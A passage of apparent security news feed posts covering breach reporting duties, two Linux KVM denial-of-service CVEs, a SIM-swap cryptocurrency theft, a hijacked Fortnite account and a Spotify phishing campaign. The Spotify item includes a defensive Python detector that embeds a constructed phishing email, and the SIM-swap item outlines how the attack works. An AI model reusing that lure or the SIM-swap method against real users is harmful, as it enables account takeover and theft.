If you store information for other businesses, notify them. If information pertaining to a certain organization is stolen, contact that organization. For example, if an attack results in the theft of bank account numbers, notify the affected banks. If the breaches involve names and Social Security numbers, you may need to contact the major credit bureaus.

You may also need to contact the individuals who may be affected by the breach and inform them of what data was affected, what you’re doing to address the situation and what individuals can do to protect themselves.

Why Report a Breach?

Reporting breaches of personal data enables regulating authorities, law enforcement and individuals to take action to reduce the amount of damage that may occur. Some of these authorities may also be able to help you ensure your system is secure again and prevent further data loss.

The laws that affect your organization can vary depending on your location, industry and other factors. Consider these requirements as well as what is best for the individuals affected when deciding whether to report a breach.

 

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, data breach)

The post When Do You Need to Report a Data Breach? appeared first on Security Affairs.

Linux Kernel is affected by two DoS vulnerabilities still unpatched

Linux Kernel is affected by two denial-of-service (DoS) flaws, both of which are NULL pointer dereference issues.

Linux Kernel is affected by two denial-of-service (DoS) vulnerabilities; the issues impact Linux kernel 4.19.2 and previous versions.

Both flaws are rated Medium severity and are NULL pointer dereference bugs in the x86 KVM code that a local attacker can trigger to crash the host kernel. Because they live in the hypervisor, exploitation requires the ability to create and run a KVM virtual machine, which normally means access to /dev/kvm.

The first vulnerability tracked as CVE-2018-19406 resides in the Linux kernel function called kvm_pv_send_ipi implemented in arch/x86/kvm/lapic.c.

A local attacker can exploit the flaw by using crafted system calls to reach a situation where the apic map is not initialized.

“kvm_pv_send_ipi in arch/x86/kvm/lapic.c in the Linux kernel through 4.19.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) via crafted system calls that reach a situation where the apic map is uninitialized.” reads the security advisory.

“The reason is that the apic map has not yet been initialized, the testcase triggers pv_send_ipi interface by vmcall which results in kvm->arch.apic_map being dereferenced. This patch fixes it by checking whether or not apic map is NULL and bailing out immediately if that is the case.” reads the description of the patch published by Wanpeng Li.

The second flaw, tracked as CVE-2018-19407 resides in the Linux Kernel function vcpu_scan_ioapic that is defined in arch/x86/kvm/x86.c.

The flaw is triggered when vcpu_scan_ioapic is reached while the emulated I/O Advanced Programmable Interrupt Controller (I/O APIC) has not been initialized.

The vulnerability could be exploited by a local attacker using crafted system calls that reach a situation where ioapic is uninitialized.

“The vcpu_scan_ioapic function in arch/x86/kvm/x86.c in the Linux kernel through 4.19.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) via crafted system calls that reach a situation where ioapic is uninitialized.” reads the security advisory.

“The reason is that the testcase writes hyperv synic HV_X64_MSR_SINT6 msr and triggers scan ioapic logic to load synic vectors into EOI exit bitmap. However, irqchip is not initialized by this simple testcase, ioapic/apic objects should not be accessed,” reads the analysis published by Wanpeng Li.

Patches for both flaws were posted to the Linux Kernel Mailing List (LKML) but, at the time of writing, had not yet been merged upstream.

Pierluigi Paganini

(Security Affairs – Linux Kernel, DoS)

The post Linux Kernel is affected by two DoS vulnerabilities still unpatched appeared first on Security Affairs.

Security Affairs: Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-year-old man from New York, is accused of stealing $1 million from a Silicon Valley executive via SIM swap, and of targeting other individuals.

Nicholas Truglia, a 21-year-old man from New York, has been accused of stealing $1 million from a Silicon Valley executive via SIM swap. He hijacked the victim's phone number, used it to impersonate him and drained cryptocurrency from two accounts the executive held at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected of having targeted more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

Truglia has been charged with a total of 21 counts, including identity theft, fraud, embezzlement and attempted grand theft; his attempts to rob the other targets reportedly failed.

Police searched Truglia's home under a warrant and recovered $300,000 worth of cryptocurrency from his hardware wallet. At the time of writing there is no word on the whereabouts of the remaining stolen funds.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

SIM swap fraud defeats the additional security layer that banks and online services add on top of passwords: once the attacker controls the victim's phone number, one-time codes and SMS notifications are delivered to the attacker, who can then authorize transfers out of the victim's accounts.

The attacker impersonates the victim and persuades the mobile carrier's support staff to reassign the victim's number to a SIM card the attacker holds. The carrier's identity check usually amounts to a few security questions, and the attacker gathers the answers beforehand through social engineering or OSINT. For this reason SMS-based codes should not be the only second factor protecting high-value accounts such as cryptocurrency exchanges: authenticator apps and hardware security keys are not affected by a number takeover, and most carriers let customers set a port-out PIN that must be provided before a number is moved.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.



Hacker takeovers Drake’s Fortnite account to yell racial slurs

By Carolina

The official Fortnite account of the Canadian rapper Drake, going by the handle “Duddus647”, was hacked in an attack on Thanksgiving weekend. The hacker used the account to join a Fortnite live-stream charity event run by Ninja, a pro streamer, and shout racial slurs and obscenities. The charity event was supposed to raise funds for the Ellen DeGeneres Wildlife Fund. Upon witnessing the non-stop […]

This is a post from HackRead.com Read the original post: Hacker takeovers Drake’s Fortnite account to yell racial slurs

Security Affairs: Very trivial Spotify phishing campaign uncovered by experts

Researchers at AppRiver uncovered a very trivial phishing campaign targeting the streaming service Spotify; even so, it is worth sharing information about it.

Security researchers at AppRiver uncovered a phishing campaign targeting the popular streaming service Spotify.

The phishing campaign was discovered in early November; attackers used convincing emails to trick Spotify users into providing their account credentials.

The messages include a link that points to phishing websites that prompt users into entering their username and password. Attackers use them to compromise the Spotify accounts and any other account on other services that share the same credentials.

“Recently, AppRiver detected a phishing campaign that was targeting Spotify customers by email with the purpose of hijacking the owner’s account.” reads the analysis published by AppRiver.

“The attacker attempted to dupe users into clicking on a phishing link that would redirect them to a deceptive website. Once at the site, users were prompted to enter their user name and password (surprise!), giving the attacker the ability to hijack the account.”

spotify phishing campaign

Attackers set up a login page that looks identical to the actual Spotify login page, but with a URL that isn’t the legitimate one.

Experts also pointed out that the “From” address domain is not the official Spotify one.

The attackers trick victims into clicking a green button labelled “CONFIRM ACCOUNT.” The messages pose as urgent communications about account restrictions that the user can supposedly remove by taking action.

Clicking the button redirects users to the phishing page.
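The two indicators AppRiver calls out, a sender domain that is not Spotify’s and a login link whose URL is not the legitimate one, can be checked mechanically before a message reaches a user. The following is an added example (not code from AppRiver or Security Affairs) that parses a constructed message modelled on the campaign and flags both; the allowlist and the lookalike domain are assumptions made for the example.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Official domain(s) the sender and every link in a genuine Spotify mail should belong to.
# Assumption for this example; a real deployment would maintain this list per brand.
LEGIT_DOMAINS = {"spotify.com"}

# Constructed sample modelled on the campaign described above: lookalike sender domain,
# urgent "account restricted" pretext and a CONFIRM ACCOUNT button. Not a real capture.
PHISH_EML = """From: Spotify <no-reply@spotify-account-verify.example>
To: victim@example.org
Subject: Action required: your account has been restricted
Content-Type: text/html; charset=utf-8

<html><body><p>Your account has restrictions. Confirm it to keep listening.</p>
<a href="https://login.spotify-account-verify.example/confirm">CONFIRM ACCOUNT</a>
</body></html>
"""

# Constructed benign counterpart: same layout, official sender and link domains.
LEGIT_EML = PHISH_EML.replace("spotify-account-verify.example", "spotify.com")


def registrable(host):
    """Crude registrable-domain reduction (last two labels); a public-suffix list is better."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


class LinkCollector(HTMLParser):
    """Collect every href from <a> tags in an HTML body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]


def check_message(raw):
    """Return findings for a sender or link domain that is not an official one."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    from_hdr = msg["from"]
    sender = from_hdr.addresses[0].domain if from_hdr and from_hdr.addresses else ""
    if registrable(sender) not in LEGIT_DOMAINS:
        findings.append(f"From domain {sender!r} is not official")
    body = msg.get_body(preferencelist=("html", "plain"))
    if body is not None:
        collector = LinkCollector()
        collector.feed(body.get_content())
        for href in collector.hrefs:
            host = urlparse(href).hostname or ""
            if registrable(host) not in LEGIT_DOMAINS:
                findings.append(f"link host {host!r} is not official")
    return findings
```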

Frankly, this specific campaign is not complex and most users could easily spot it.

The post published by the experts has just one goal: to share information about a campaign that could deceive non-tech-savvy users. For this reason, I decided to write about the Spotify campaign too.

Pierluigi Paganini

(Security Affairs – Spotify phishing campaign, cybercrime)

The post Very trivial Spotify phishing campaign uncovered by experts appeared first on Security Affairs.
